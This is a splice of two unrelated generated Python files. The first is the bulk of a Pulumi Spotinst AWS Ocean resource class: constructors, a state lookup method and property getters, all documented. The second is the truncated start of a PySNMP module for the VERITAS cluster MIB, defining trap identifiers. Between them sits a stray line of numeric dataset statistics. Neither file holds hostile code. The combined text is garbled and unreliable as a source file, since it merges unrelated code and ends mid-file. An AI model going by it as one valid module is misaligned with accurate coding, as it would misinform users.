name: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
root_volume_size: Optional[pulumi.Input[int]] = None,
scheduled_tasks: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OceanScheduledTaskArgs']]]]] = None,
security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
spot_percentage: Optional[pulumi.Input[int]] = None,
subnet_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OceanTagArgs']]]]] = None,
update_policy: Optional[pulumi.Input[pulumi.InputType['OceanUpdatePolicyArgs']]] = None,
use_as_template_only: Optional[pulumi.Input[bool]] = None,
user_data: Optional[pulumi.Input[str]] = None,
utilize_commitments: Optional[pulumi.Input[bool]] = None,
utilize_reserved_instances: Optional[pulumi.Input[bool]] = None,
whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None):
"""
Create a Ocean resource with the given unique name, props, and options.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] associate_public_ip_address: Configure public IP address allocation.
:param pulumi.Input[pulumi.InputType['OceanAutoscalerArgs']] autoscaler: Describes the Ocean Kubernetes Auto Scaler.
:param pulumi.Input[Sequence[pulumi.Input[str]]] blacklists: Instance types not allowed in the Ocean cluster. Cannot be configured if `whitelist` is configured.
:param pulumi.Input[str] controller_id: A unique identifier used for connecting the Ocean SaaS platform and the Kubernetes cluster. Typically, the cluster name is used as its identifier.
:param pulumi.Input[int] desired_capacity: The number of instances to launch and maintain in the cluster.
:param pulumi.Input[int] draining_timeout: The time in seconds, the instance is allowed to run while detached from the ELB. This is to allow the instance time to be drained from incoming TCP connections before terminating it, during a scale down operation.
:param pulumi.Input[bool] ebs_optimized: Enable EBS optimized for cluster. Flag will enable optimized capacity for high bandwidth connectivity to the EB service for non EBS optimized instance types. For instances that are EBS optimized this flag will be ignored.
:param pulumi.Input[bool] fallback_to_ondemand: If not Spot instance markets are available, enable Ocean to launch On-Demand instances instead.
:param pulumi.Input[int] grace_period: The amount of time, in seconds, after the instance has launched to start checking its health.
:param pulumi.Input[str] iam_instance_profile: The instance profile iam role.
:param pulumi.Input[str] image_id: ID of the image used to launch the instances.
:param pulumi.Input[pulumi.InputType['OceanInstanceMetadataOptionsArgs']] instance_metadata_options: Ocean instance metadata options object for IMDSv2.
:param pulumi.Input[str] key_name: The key pair to attach the instances.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OceanLoadBalancerArgs']]]] load_balancers: - Array of load balancer objects to add to ocean cluster
:param pulumi.Input[pulumi.InputType['OceanLoggingArgs']] logging: Logging configuration.
:param pulumi.Input[int] max_size: The upper limit of instances the cluster can scale up to.
:param pulumi.Input[int] min_size: The lower limit of instances the cluster can scale down to.
:param pulumi.Input[bool] monitoring: Enable detailed monitoring for cluster. Flag will enable Cloud Watch detailed monitoring (one minute increments). Note: there are additional hourly costs for this service based on the region used.
:param pulumi.Input[str] name: Required if type is set to `CLASSIC`
:param pulumi.Input[str] region: The region the cluster will run in.
:param pulumi.Input[int] root_volume_size: The size (in Gb) to allocate for the root volume. Minimum `20`.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OceanScheduledTaskArgs']]]] scheduled_tasks: Set scheduling object.
:param pulumi.Input[Sequence[pulumi.Input[str]]] security_groups: One or more security group ids.
:param pulumi.Input[int] spot_percentage: The percentage of Spot instances that would spin up from the `desired_capacity` number.
:param pulumi.Input[Sequence[pulumi.Input[str]]] subnet_ids: A comma-separated list of subnet identifiers for the Ocean cluster. Subnet IDs should be configured with auto assign public IP.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OceanTagArgs']]]] tags: Optionally adds tags to instances launched in an Ocean cluster.
:param pulumi.Input[bool] use_as_template_only: launch specification defined on the Ocean object will function only as a template for virtual node groups.
When set to true, on Ocean resource creation please make sure your custom VNG has an initial_nodes parameter to create nodes for your VNG.
:param pulumi.Input[str] user_data: Base64-encoded MIME user data to make available to the instances.
:param pulumi.Input[bool] utilize_reserved_instances: If Reserved instances exist, Ocean will utilize them before launching Spot instances.
:param pulumi.Input[Sequence[pulumi.Input[str]]] whitelists: Instance types allowed in the Ocean cluster. Cannot be configured if `blacklist` is configured.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: OceanArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Create a Ocean resource with the given unique name, props, and options.
:param str resource_name: The name of the resource.
:param OceanArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(OceanArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
associate_public_ip_address: Optional[pulumi.Input[bool]] = None,
autoscaler: Optional[pulumi.Input[pulumi.InputType['OceanAutoscalerArgs']]] = None,
blacklists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
controller_id: Optional[pulumi.Input[str]] = None,
desired_capacity: Optional[pulumi.Input[int]] = None,
draining_timeout: Optional[pulumi.Input[int]] = None,
ebs_optimized: Optional[pulumi.Input[bool]] = None,
fallback_to_ondemand: Optional[pulumi.Input[bool]] = None,
grace_period: Optional[pulumi.Input[int]] = None,
iam_instance_profile: Optional[pulumi.Input[str]] = None,
image_id: Optional[pulumi.Input[str]] = None,
instance_metadata_options: Optional[pulumi.Input[pulumi.InputType['OceanInstanceMetadataOptionsArgs']]] = None,
key_name: Optional[pulumi.Input[str]] = None,
load_balancers: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OceanLoadBalancerArgs']]]]] = None,
logging: Optional[pulumi.Input[pulumi.InputType['OceanLoggingArgs']]] = None,
max_size: Optional[pulumi.Input[int]] = None,
min_size: Optional[pulumi.Input[int]] = None,
monitoring: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
root_volume_size: Optional[pulumi.Input[int]] = None,
scheduled_tasks: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OceanScheduledTaskArgs']]]]] = None,
security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
spot_percentage: Optional[pulumi.Input[int]] = None,
subnet_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OceanTagArgs']]]]] = None,
update_policy: Optional[pulumi.Input[pulumi.InputType['OceanUpdatePolicyArgs']]] = None,
use_as_template_only: Optional[pulumi.Input[bool]] = None,
user_data: Optional[pulumi.Input[str]] = None,
utilize_commitments: Optional[pulumi.Input[bool]] = None,
utilize_reserved_instances: Optional[pulumi.Input[bool]] = None,
whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = OceanArgs.__new__(OceanArgs)
__props__.__dict__["associate_public_ip_address"] = associate_public_ip_address
__props__.__dict__["autoscaler"] = autoscaler
__props__.__dict__["blacklists"] = blacklists
__props__.__dict__["controller_id"] = controller_id
__props__.__dict__["desired_capacity"] = desired_capacity
__props__.__dict__["draining_timeout"] = draining_timeout
__props__.__dict__["ebs_optimized"] = ebs_optimized
__props__.__dict__["fallback_to_ondemand"] = fallback_to_ondemand
__props__.__dict__["grace_period"] = grace_period
__props__.__dict__["iam_instance_profile"] = iam_instance_profile
__props__.__dict__["image_id"] = image_id
__props__.__dict__["instance_metadata_options"] = instance_metadata_options
__props__.__dict__["key_name"] = key_name
__props__.__dict__["load_balancers"] = load_balancers
__props__.__dict__["logging"] = logging
__props__.__dict__["max_size"] = max_size
__props__.__dict__["min_size"] = min_size
__props__.__dict__["monitoring"] = monitoring
__props__.__dict__["name"] = name
__props__.__dict__["region"] = region
__props__.__dict__["root_volume_size"] = root_volume_size
__props__.__dict__["scheduled_tasks"] = scheduled_tasks
if security_groups is None and not opts.urn:
raise TypeError("Missing required property 'security_groups'")
__props__.__dict__["security_groups"] = security_groups
__props__.__dict__["spot_percentage"] = spot_percentage
if subnet_ids is None and not opts.urn:
raise TypeError("Missing required property 'subnet_ids'")
__props__.__dict__["subnet_ids"] = subnet_ids
__props__.__dict__["tags"] = tags
__props__.__dict__["update_policy"] = update_policy
__props__.__dict__["use_as_template_only"] = use_as_template_only
__props__.__dict__["user_data"] = user_data
__props__.__dict__["utilize_commitments"] = utilize_commitments
__props__.__dict__["utilize_reserved_instances"] = utilize_reserved_instances
__props__.__dict__["whitelists"] = whitelists
super(Ocean, __self__).__init__(
'spotinst:aws/ocean:Ocean',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
associate_public_ip_address: Optional[pulumi.Input[bool]] = None,
autoscaler: Optional[pulumi.Input[pulumi.InputType['OceanAutoscalerArgs']]] = None,
blacklists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
controller_id: Optional[pulumi.Input[str]] = None,
desired_capacity: Optional[pulumi.Input[int]] = None,
draining_timeout: Optional[pulumi.Input[int]] = None,
ebs_optimized: Optional[pulumi.Input[bool]] = None,
fallback_to_ondemand: Optional[pulumi.Input[bool]] = None,
grace_period: Optional[pulumi.Input[int]] = None,
iam_instance_profile: Optional[pulumi.Input[str]] = None,
image_id: Optional[pulumi.Input[str]] = None,
instance_metadata_options: Optional[pulumi.Input[pulumi.InputType['OceanInstanceMetadataOptionsArgs']]] = None,
key_name: Optional[pulumi.Input[str]] = None,
load_balancers: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OceanLoadBalancerArgs']]]]] = None,
logging: Optional[pulumi.Input[pulumi.InputType['OceanLoggingArgs']]] = None,
max_size: Optional[pulumi.Input[int]] = None,
min_size: Optional[pulumi.Input[int]] = None,
monitoring: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
root_volume_size: Optional[pulumi.Input[int]] = None,
scheduled_tasks: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OceanScheduledTaskArgs']]]]] = None,
security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
spot_percentage: Optional[pulumi.Input[int]] = None,
subnet_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OceanTagArgs']]]]] = None,
update_policy: Optional[pulumi.Input[pulumi.InputType['OceanUpdatePolicyArgs']]] = None,
use_as_template_only: Optional[pulumi.Input[bool]] = None,
user_data: Optional[pulumi.Input[str]] = None,
utilize_commitments: Optional[pulumi.Input[bool]] = None,
utilize_reserved_instances: Optional[pulumi.Input[bool]] = None,
whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None) -> 'Ocean':
"""
Get an existing Ocean resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] associate_public_ip_address: Configure public IP address allocation.
:param pulumi.Input[pulumi.InputType['OceanAutoscalerArgs']] autoscaler: Describes the Ocean Kubernetes Auto Scaler.
:param pulumi.Input[Sequence[pulumi.Input[str]]] blacklists: Instance types not allowed in the Ocean cluster. Cannot be configured if `whitelist` is configured.
:param pulumi.Input[str] controller_id: A unique identifier used for connecting the Ocean SaaS platform and the Kubernetes cluster. Typically, the cluster name is used as its identifier.
:param pulumi.Input[int] desired_capacity: The number of instances to launch and maintain in the cluster.
:param pulumi.Input[int] draining_timeout: The time in seconds, the instance is allowed to run while detached from the ELB. This is to allow the instance time to be drained from incoming TCP connections before terminating it, during a scale down operation.
:param pulumi.Input[bool] ebs_optimized: Enable EBS optimized for cluster. Flag will enable optimized capacity for high bandwidth connectivity to the EB service for non EBS optimized instance types. For instances that are EBS optimized this flag will be ignored.
:param pulumi.Input[bool] fallback_to_ondemand: If not Spot instance markets are available, enable Ocean to launch On-Demand instances instead.
:param pulumi.Input[int] grace_period: The amount of time, in seconds, after the instance has launched to start checking its health.
:param pulumi.Input[str] iam_instance_profile: The instance profile iam role.
:param pulumi.Input[str] image_id: ID of the image used to launch the instances.
:param pulumi.Input[pulumi.InputType['OceanInstanceMetadataOptionsArgs']] instance_metadata_options: Ocean instance metadata options object for IMDSv2.
:param pulumi.Input[str] key_name: The key pair to attach the instances.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OceanLoadBalancerArgs']]]] load_balancers: - Array of load balancer objects to add to ocean cluster
:param pulumi.Input[pulumi.InputType['OceanLoggingArgs']] logging: Logging configuration.
:param pulumi.Input[int] max_size: The upper limit of instances the cluster can scale up to.
:param pulumi.Input[int] min_size: The lower limit of instances the cluster can scale down to.
:param pulumi.Input[bool] monitoring: Enable detailed monitoring for cluster. Flag will enable Cloud Watch detailed monitoring (one minute increments). Note: there are additional hourly costs for this service based on the region used.
:param pulumi.Input[str] name: Required if type is set to `CLASSIC`
:param pulumi.Input[str] region: The region the cluster will run in.
:param pulumi.Input[int] root_volume_size: The size (in Gb) to allocate for the root volume. Minimum `20`.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OceanScheduledTaskArgs']]]] scheduled_tasks: Set scheduling object.
:param pulumi.Input[Sequence[pulumi.Input[str]]] security_groups: One or more security group ids.
:param pulumi.Input[int] spot_percentage: The percentage of Spot instances that would spin up from the `desired_capacity` number.
:param pulumi.Input[Sequence[pulumi.Input[str]]] subnet_ids: A comma-separated list of subnet identifiers for the Ocean cluster. Subnet IDs should be configured with auto assign public IP.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OceanTagArgs']]]] tags: Optionally adds tags to instances launched in an Ocean cluster.
:param pulumi.Input[bool] use_as_template_only: launch specification defined on the Ocean object will function only as a template for virtual node groups.
When set to true, on Ocean resource creation please make sure your custom VNG has an initial_nodes parameter to create nodes for your VNG.
:param pulumi.Input[str] user_data: Base64-encoded MIME user data to make available to the instances.
:param pulumi.Input[bool] utilize_reserved_instances: If Reserved instances exist, Ocean will utilize them before launching Spot instances.
:param pulumi.Input[Sequence[pulumi.Input[str]]] whitelists: Instance types allowed in the Ocean cluster. Cannot be configured if `blacklist` is configured.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _OceanState.__new__(_OceanState)
__props__.__dict__["associate_public_ip_address"] = associate_public_ip_address
__props__.__dict__["autoscaler"] = autoscaler
__props__.__dict__["blacklists"] = blacklists
__props__.__dict__["controller_id"] = controller_id
__props__.__dict__["desired_capacity"] = desired_capacity
__props__.__dict__["draining_timeout"] = draining_timeout
__props__.__dict__["ebs_optimized"] = ebs_optimized
__props__.__dict__["fallback_to_ondemand"] = fallback_to_ondemand
__props__.__dict__["grace_period"] = grace_period
__props__.__dict__["iam_instance_profile"] = iam_instance_profile
__props__.__dict__["image_id"] = image_id
__props__.__dict__["instance_metadata_options"] = instance_metadata_options
__props__.__dict__["key_name"] = key_name
__props__.__dict__["load_balancers"] = load_balancers
__props__.__dict__["logging"] = logging
__props__.__dict__["max_size"] = max_size
__props__.__dict__["min_size"] = min_size
__props__.__dict__["monitoring"] = monitoring
__props__.__dict__["name"] = name
__props__.__dict__["region"] = region
__props__.__dict__["root_volume_size"] = root_volume_size
__props__.__dict__["scheduled_tasks"] = scheduled_tasks
__props__.__dict__["security_groups"] = security_groups
__props__.__dict__["spot_percentage"] = spot_percentage
__props__.__dict__["subnet_ids"] = subnet_ids
__props__.__dict__["tags"] = tags
__props__.__dict__["update_policy"] = update_policy
__props__.__dict__["use_as_template_only"] = use_as_template_only
__props__.__dict__["user_data"] = user_data
__props__.__dict__["utilize_commitments"] = utilize_commitments
__props__.__dict__["utilize_reserved_instances"] = utilize_reserved_instances
__props__.__dict__["whitelists"] = whitelists
return Ocean(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="associatePublicIpAddress")
def associate_public_ip_address(self) -> pulumi.Output[Optional[bool]]:
"""
Configure public IP address allocation.
"""
return pulumi.get(self, "associate_public_ip_address")
@property
@pulumi.getter
def autoscaler(self) -> pulumi.Output[Optional['outputs.OceanAutoscaler']]:
"""
Describes the Ocean Kubernetes Auto Scaler.
"""
return pulumi.get(self, "autoscaler")
@property
@pulumi.getter
def blacklists(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
Instance types not allowed in the Ocean cluster. Cannot be configured if `whitelist` is configured.
"""
return pulumi.get(self, "blacklists")
@property
@pulumi.getter(name="controllerId")
def controller_id(self) -> pulumi.Output[Optional[str]]:
"""
A unique identifier used for connecting the Ocean SaaS platform and the Kubernetes cluster. Typically, the cluster name is used as its identifier.
"""
return pulumi.get(self, "controller_id")
@property
@pulumi.getter(name="desiredCapacity")
def desired_capacity(self) -> pulumi.Output[int]:
"""
The number of instances to launch and maintain in the cluster.
"""
return pulumi.get(self, "desired_capacity")
@property
@pulumi.getter(name="drainingTimeout")
def draining_timeout(self) -> pulumi.Output[Optional[int]]:
"""
The time in seconds, the instance is allowed to run while detached from the ELB. This is to allow the instance time to be drained from incoming TCP connections before terminating it, during a scale down operation.
"""
return pulumi.get(self, "draining_timeout")
@property
@pulumi.getter(name="ebsOptimized")
def ebs_optimized(self) -> pulumi.Output[Optional[bool]]:
"""
Enable EBS optimized for cluster. Flag will enable optimized capacity for high bandwidth connectivity to the EB service for non EBS optimized instance types. For instances that are EBS optimized this flag will be ignored.
"""
return pulumi.get(self, "ebs_optimized")
@property
@pulumi.getter(name="fallbackToOndemand")
def fallback_to_ondemand(self) -> pulumi.Output[Optional[bool]]:
"""
If not Spot instance markets are available, enable Ocean to launch On-Demand instances instead.
"""
return pulumi.get(self, "fallback_to_ondemand")
@property
@pulumi.getter(name="gracePeriod")
def grace_period(self) -> pulumi.Output[Optional[int]]:
"""
The amount of time, in seconds, after the instance has launched to start checking its health.
"""
return pulumi.get(self, "grace_period")
@property
@pulumi.getter(name="iamInstanceProfile")
def iam_instance_profile(self) -> pulumi.Output[Optional[str]]:
"""
The instance profile iam role.
"""
return pulumi.get(self, "iam_instance_profile")
@property
@pulumi.getter(name="imageId")
def image_id(self) -> pulumi.Output[Optional[str]]:
"""
ID of the image used to launch the instances.
"""
return pulumi.get(self, "image_id")
@property
@pulumi.getter(name="instanceMetadataOptions")
def instance_metadata_options(self) -> pulumi.Output[Optional['outputs.OceanInstanceMetadataOptions']]:
"""
Ocean instance metadata options object for IMDSv2.
"""
return pulumi.get(self, "instance_metadata_options")
@property
@pulumi.getter(name="keyName")
def key_name(self) -> pulumi.Output[Optional[str]]:
"""
The key pair to attach the instances.
"""
return pulumi.get(self, "key_name")
@property
@pulumi.getter(name="loadBalancers")
def load_balancers(self) -> pulumi.Output[Optional[Sequence['outputs.OceanLoadBalancer']]]:
"""
- Array of load balancer objects to add to ocean cluster
"""
return pulumi.get(self, "load_balancers")
@property
@pulumi.getter
def logging(self) -> pulumi.Output[Optional['outputs.OceanLogging']]:
"""
Logging configuration.
"""
return pulumi.get(self, "logging")
@property
@pulumi.getter(name="maxSize")
def max_size(self) -> pulumi.Output[Optional[int]]:
"""
The upper limit of instances the cluster can scale up to.
"""
return pulumi.get(self, "max_size")
@property
@pulumi.getter(name="minSize")
def min_size(self) -> pulumi.Output[int]:
"""
The lower limit of instances the cluster can scale down to.
"""
return pulumi.get(self, "min_size")
@property
@pulumi.getter
def monitoring(self) -> pulumi.Output[Optional[bool]]:
"""
Enable detailed monitoring for cluster. Flag will enable Cloud Watch detailed monitoring (one minute increments). Note: there are additional hourly costs for this service based on the region used.
"""
return pulumi.get(self, "monitoring")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Required if type is set to `CLASSIC`
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def region(self) -> pulumi.Output[Optional[str]]:
"""
The region the cluster will run in.
"""
return pulumi.get(self, "region")
@property
@pulumi.getter(name="rootVolumeSize")
def root_volume_size(self) -> pulumi.Output[Optional[int]]:
"""
The size (in Gb) to allocate for the root volume. Minimum `20`.
"""
return pulumi.get(self, "root_volume_size")
@property
@pulumi.getter(name="scheduledTasks")
def scheduled_tasks(self) -> pulumi.Output[Optional[Sequence['outputs.OceanScheduledTask']]]:
"""
Set scheduling object.
"""
return pulumi.get(self, "scheduled_tasks")
@property
@pulumi.getter(name="securityGroups")
def security_groups(self) -> pulumi.Output[Sequence[str]]:
"""
One or more security group ids.
"""
return pulumi.get(self, "security_groups")
@property
@pulumi.getter(name="spotPercentage")
def spot_percentage(self) -> pulumi.Output[Optional[int]]:
"""
The percentage of Spot instances that would spin up from the `desired_capacity` number.
"""
return pulumi.get(self, "spot_percentage")
@property
@pulumi.getter(name="subnetIds")
def subnet_ids(self) -> pulumi.Output[Sequence[str]]:
"""
A comma-separated list of subnet identifiers for the Ocean cluster. Subnet IDs should be configured with auto assign public IP.
"""
return pulumi.get(self, "subnet_ids")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Sequence['outputs.OceanTag']]]:
"""
Optionally adds tags to instances launched in an Ocean cluster.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="updatePolicy")
def update_policy(self) -> pulumi.Output[Optional['outputs.OceanUpdatePolicy']]:
return pulumi.get(self, "update_policy")
@property
@pulumi.getter(name="useAsTemplateOnly")
def use_as_template_only(self) -> pulumi.Output[Optional[bool]]:
"""
launch specification defined on the Ocean object will function only as a template for virtual node groups.
When set to true, on Ocean resource creation please make sure your custom VNG has an initial_nodes parameter to create nodes for your VNG.
"""
return pulumi.get(self, "use_as_template_only")
@property
@pulumi.getter(name="userData")
def user_data(self) -> pulumi.Output[Optional[str]]:
"""
Base64-encoded MIME user data to make available to the instances.
"""
return pulumi.get(self, "user_data")
@property
@pulumi.getter(name="utilizeCommitments")
def utilize_commitments(self) -> pulumi.Output[Optional[bool]]:
return pulumi.get(self, "utilize_commitments")
@property
@pulumi.getter(name="utilizeReservedInstances")
def utilize_reserved_instances(self) -> pulumi.Output[Optional[bool]]:
"""
If Reserved instances exist, Ocean will utilize them before launching Spot instances.
"""
return pulumi.get(self, "utilize_reserved_instances")
@property
@pulumi.getter
def whitelists(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
Instance types allowed in the Ocean cluster. Cannot be configured if `blacklist` is configured.
"""
return pulumi.get(self, "whitelists")
| 51.108312 | 270 | 0.676762 | 9,690 | 81,160 | 5.467595 | 0.03612 | 0.104434 | 0.101131 | 0.034427 | 0.968498 | 0.961779 | 0.948717 | 0.943282 | 0.937147 | 0.920236 | 0 | 0.00057 | 0.22171 | 81,160 | 1,587 | 271 | 51.140517 | 0.838188 | 0.309808 | 0 | 0.908999 | 1 | 0 | 0.124784 | 0.036747 | 0 | 0 | 0 | 0 | 0 | 1 | 0.168857 | false | 0.001011 | 0.007078 | 0.006067 | 0.277048 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
941592e7be5e1d67879a16f149bcf752840dbbee | 32,550 | py | Python | pysnmp/VERITAS-CLUSTER-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 11 | 2021-02-02T16:27:16.000Z | 2021-08-31T06:22:49.000Z | pysnmp/VERITAS-CLUSTER-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 75 | 2021-02-24T17:30:31.000Z | 2021-12-08T00:01:18.000Z | pysnmp/VERITAS-CLUSTER-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module VERITAS-CLUSTER-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/VERITAS-CLUSTER-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 21:26:59 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ValueRangeConstraint, ConstraintsUnion, ValueSizeConstraint, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ValueRangeConstraint", "ConstraintsUnion", "ValueSizeConstraint", "ConstraintsIntersection")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
enterprises, Unsigned32, Bits, Counter32, ObjectIdentity, Gauge32, Counter64, NotificationType, IpAddress, ModuleIdentity, NotificationType, MibIdentifier, MibScalar, MibTable, MibTableRow, MibTableColumn, Integer32, iso, TimeTicks = mibBuilder.importSymbols("SNMPv2-SMI", "enterprises", "Unsigned32", "Bits", "Counter32", "ObjectIdentity", "Gauge32", "Counter64", "NotificationType", "IpAddress", "ModuleIdentity", "NotificationType", "MibIdentifier", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Integer32", "iso", "TimeTicks")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
veritassoftware = MibIdentifier((1, 3, 6, 1, 4, 1, 1302))
products = MibIdentifier((1, 3, 6, 1, 4, 1, 1302, 3))
veritasCluster = ModuleIdentity((1, 3, 6, 1, 4, 1, 1302, 3, 8))
if mibBuilder.loadTexts: veritasCluster.setLastUpdated('03202001')
if mibBuilder.loadTexts: veritasCluster.setOrganization('VERITAS Software, Inc.')
clustertraps = MibIdentifier((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10))
clustertrapvars = MibIdentifier((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 1))
clustertrapsGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2))
resourcesTraps = MibIdentifier((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 1))
groupsTraps = MibIdentifier((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 2))
systemsTraps = MibIdentifier((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 3))
vcsHeartbeatTraps = MibIdentifier((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 4))
gcmHeartbeatTraps = MibIdentifier((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 5))
vcsTraps = MibIdentifier((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 6))
gcmSiteTraps = MibIdentifier((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 7))
agentsTraps = MibIdentifier((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 8))
externalTraps = MibIdentifier((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 9))
rdcTraps = MibIdentifier((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 2, 10))
trapOrigin = MibScalar((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 1, 1), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 50))).setMaxAccess("readonly")
if mibBuilder.loadTexts: trapOrigin.setStatus('mandatory')
entityType = MibScalar((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 50))).setMaxAccess("readonly")
if mibBuilder.loadTexts: entityType.setStatus('mandatory')
entitySubType = MibScalar((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 1, 3), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 50))).setMaxAccess("readonly")
if mibBuilder.loadTexts: entitySubType.setStatus('mandatory')
entityName = MibScalar((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 50))).setMaxAccess("readonly")
if mibBuilder.loadTexts: entityName.setStatus('mandatory')
entityOwner = MibScalar((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 1, 5), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 50))).setMaxAccess("readonly")
if mibBuilder.loadTexts: entityOwner.setStatus('mandatory')
systemName = MibScalar((1, 3, 6, 1, 4, 1, 1302, 3, 8, 10, 1, 6), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 80))).setMaxAccess("readonly")
if mibBuilder.loadTexts: systemName.setStatus('mandatory')
